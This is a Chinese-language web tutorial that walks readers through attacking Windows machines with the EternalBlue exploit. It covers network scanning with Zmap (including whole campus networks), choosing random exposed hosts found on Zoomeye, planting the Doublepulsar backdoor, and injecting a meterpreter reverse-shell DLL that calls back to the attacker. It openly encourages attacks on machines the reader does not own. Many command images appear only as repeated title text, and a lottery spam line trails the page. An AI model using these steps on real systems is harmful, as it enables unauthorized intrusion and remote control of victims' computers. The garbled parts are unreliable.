手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

安裝 MSF

Linux & Mac OS X

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

假如遇到問題,點開這個連接,然后自個想想方法……

查看是否安裝成功

然后輸入 msfconsole 看看裝置是不是成功了……

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

這樣的話就算成功了。

安裝 WINE 和 winetricks

Linux

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

OSX

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

安裝 Windows Python 環境

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

跟著 wizard 走完就行了……一路下一步。

復制工具包到 Windows 分區

默認 WINE 環境的虛擬磁盤在?~/.wine/drive_c

把那個工具包里的?windows?文件夾改個名字,復制到這里去……

比如改名叫 tools,復制到?~/.wine/drive_c/tools。

進入 Win CMD

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

如果這一步出現什么?wrong font?錯誤,可以試試安裝?fonts-wine?包,或者用?winetricks –gui,選擇默認 WINE ,安裝字體,勾上?corefont。

沒錯的話會出現一個黑框框,就是 CMD 了,先?右鍵 – properties – font?調整一下字體什么的,注意確定保存的時候選第一個單選框……調到你覺得好看的字體為止。然后:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

試一下 Win 上的 Python 有沒有安裝好,如果沒問題就?Ctrl-D?退出。

修改 fuzzbunch 默認配置

到?~/.wine/drive_c/tools?這里,用文本編輯器打開?fuzzbunch.xml。

修改?ResourcesDir?為?C:\tools\Resources,LogDir?為?C:\logs。

運行 fuzzbunch

再次打開 CMD,cd 到 Python 目錄,然后執行:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

如果出現這樣的話環境就算是配置好了:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

然后可以暫時退出了。

查看網絡環境

本機上執行:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

找到自己正在使用的網絡,記下 IP 和 子網掩碼。

安裝 Zmap

Zmap 是一個快速的網絡掃描器,反正就是收集信息用的。

Linux

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

OSX

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

安裝好了之后?sudo zmap –version?測試一下。

掃描子網

根據你上一步得到的 IP 和子網掩碼,掃描網絡。

假如你的 IP 是?10.128.129.45?子網掩碼?255.255.192.0,把子網掩碼按照下表換成數字,然后加起來。

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

所以?255.255.192.0 = 8 + 8 + 2 = 18。要掃描的 CIDR 就是?10.128.129.45/18

然后運行:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

-B?選項后面的是掃描速度,根據你們的內網帶寬找一個合適的速度填就行。比如我們內網 100M,我就用一半的速度掃。

如果遇到 blacklist 的錯誤,可以去修改?/etc/zmap/blacklist.conf?這個文件,把需要掃描的內網地址注釋掉:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

如果遇到?interface?什么的錯誤,就用?-i <interface>?指定要使用的網卡。比如你是用 WiFi 的話就?-i wlan0。

如果遇到?get-gateway?的錯誤,就先運行?netstat -nr?得到網關的 IP,然后運行?sudo arp -a <網關IP>?獲取他的 MAC 地址:見下圖:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

獲取到網關 MAC 之后,用?-G?參數寫在命令行里即可。

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

OK,開始掃描吧,這時候等著就行了。

掃描完成之后?cat 445.csv?就可以看到所有開了 445 的機器了。

如果你掃描出來文件是空的的話……那說明你的網段可能太小了。

如果你是學生,可以考慮掃描一下全校網段,一般用?10.0.0.1/8?掃描的話應該會能得到一些結果的。

如果還是不行,那就用備選方案吧……

備選方案 – Zoomeye

如果你子網掃描出來的文件是個空的的話,你也可以選擇掃描互聯網上的機器。

當然這時候我們就不自己用 zmap 掃了,Zoomeye 可以幫助我們。

打開:https://www.zoomeye.org/

搜索框右邊的選項選主機,輸入?service:microsoft-ds os:windows country:china?Enter 搜索。

也可以加一個參數?city:beijing?來搜索特定城市的主機。

然后隨便選幾個 IP 寫到?445.csv?里去吧,一行一個 IP 就行。

漏洞檢測

現在用?msfconsole?打開 MSF,輸入?use auxiliary/scanner/smb/smb_version?注意從現在開始就不要復制命令了,最好都手打,要習慣用?Tab?補全。

前面的 msf 提示符變成?msf auxiliary(smb_version) >?就表示進入這個掃描器的上下文了。

輸入?options?查看可用的選項:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

RHOSTS?表示要掃描額主機列表,THREADS?表示掃描線程數,一般填個 50 什么的就差不多了。如果你 RHOST 數量比小于 50 的話,你也可以填少一點。

用?set?命令設置選項:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

輸入完后再用?options?查看一下選項,確認沒問題之后輸入?exploit,回車開始執行 scanner.

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

執行過程中應該會有很多信息輸出出來,等他運行完,輸入?hosts?查看當前獲得的主機資料:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

OK,一個 Win10 一個 Win7 一個 WinServer 2008 R2。

Win 7 以上的可以不用考慮了,Win 7 和 WinServer 2008 一般來說是可以的。

如果你不放心,可以使用?auxiliary/scanner/smb/smb_ms17_010?這個掃描器做一次漏洞檢測。這個就不說詳細步驟了,當作練習吧,結果大概是這樣的:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

嗯,他說 Likely 嘛,一般來說 還是選 Win 7 和 Server 2008 以下的主機當作目標吧。

OK 我現在就選那臺 Win 7 的?10.158.24.2?了,后面的操作都會用這個 IP,你記得換成你自己的目標哈。

Fuzzbunch 出場

用之前的命令啟動 WINE CMD,用 Python 打開 fuzzbunch:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

  • 第一個地方輸入你的目標的 IP 地址
  • 第二空?Callback IP?隨便填,因為用不到,這里就填?127.0.0.1?好了
  • 第三個很重要,一定?要填 no
  • 后面如果你沒有項目的話就選 0 新建一個,你下次啟動想用之前的話就選 index
  • 然后文件位置什么的就都默認,一路回車下來就行

看見?fb >?字樣的提示符就表示初始設置完成。

Eternalblue 攻擊

Fuzzbunch 的使用方法和 MSF 其實差不多。

輸入?use Eternalblue?載入攻擊模塊,同樣注意多使用?Tab?鍵。

和 MSF 不一樣,FB 會進行交互性的參數輸入:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

如果上面的參數(主要是 IP)沒錯的話,也可以輸入 no 來取消交互式輸入。

然后來到這一步,攻擊方式一定要選 1 FB 方式:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

然后繼續跟著交互提示走,Tunnels 部分直接一路回車,開始執行后門安裝:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

如果到?Receiving response from exploit packet?這句話這里停住的話,大概率是打了補丁,你可以換個目標了。

如果是停在?Triggering free of corrupted buffer?這句的話,基本就成功了,等著就好。

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

OK,等了一會之后,Eternalblue 攻擊成功。

注意觀察一下這里寫的目標機器的 Arch 是 32 bit 還是 64 bit,后面要用。

TCP 隧道

這一步需要你有公網 IP,如果你沒有的話可以用 TCP 隧道服務來代替……比如各種基于 Ngrok 的隧道服務……

這里我就不教程了……你們自己弄好就行

我現在假設你們隧道服務商 IP 是?123.123.123.123,給你的端口是?8888,你本地的端口也開?8888,下面一步操作的時候記得把這些數字換成真實的。

提示

如果你是掃描校內網,而且校內網沒有對機器互聯端口做限制的話,不用 TCP 隧道也是可以的,那你就把下面教程里的所有?LHOST?填你自己的網卡 IP 即可。

MSF 監聽反彈端口

在 MSF 里,使用?multi/handler。

如果你要攻擊的機器是 32 位的機器:

set payload windows/meterpreter/reverse_tcp

如果是 64 位的:

set payload windows/x64/meterpreter/reverse_tcp

然后

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

LHOST 就填 127.0.0.1 就可以,因為上面我們用了隧道。

最后一個?-j?是將 exploit 放在后臺運行,暫時可以不用管了。

你可以通過?jobs -l?看到所有后臺任務。

生成 Shellcode DLL

在 MSF 里執行

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

上面的?{Payload}?換成你上個階段用的 payload,然后 HOST 和 PORT 也要記得換,{ARCH}?如果是 32 位就寫?x8664 位就寫?x64。

你也可以分別生成兩個 DLL 備用,反正以后攻擊到的 32 位 64 位都有可能。

然后把這兩個 DLL 復制到?~/.wine/drive_c?目錄下

雙倍脈沖(Doublepulsar)注入

切換到 Wine CMD 里的 FB 平臺,使用?Doublepulsar

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

然后就按照提示一路 Enter,Proto 選?SMB,x86?還是?x64?根據目標機器選。

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

這一步選 2,RunDLL。

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

DLL 位置選根據你的文件名填,比如?C:\x86.dll?或者?C:\x64.dll,然后繼續 Enter。

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

當你看到這個 Success 的時候,表示注入成功。

DONE

現在切回你的 MSF 看看是不是有些?sending stage?之類的輸出。

如果沒有的話就把 DLL 的生成檢查一遍看看參數有沒有寫對,然后再執行一遍上一步。

如果有輸出的就輸入?sessions -l?查看已經連接好的?meterpreter。

然后用?sessions -i <ID>?連上去:

手把手教你用永恒之藍(Eternalblue)勒索病毒漏洞的高階用法

OK 了!后邊的我就不教了,你能夠輸入?help?然后?Tab?看看有哪些指令。然后?-h?獲取協助。

然后?https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/?這里有一些根本的后浸透指令的解說。

其實到這一步,浸透才剛剛開始

下課!

相關新聞

聯系我們

400-080-6560

在線咨詢:點擊這里給我發消息

郵件:[email protected]

工作時間:周一至周日,09:00-18:30

QR code
云南快乐10分开奖直播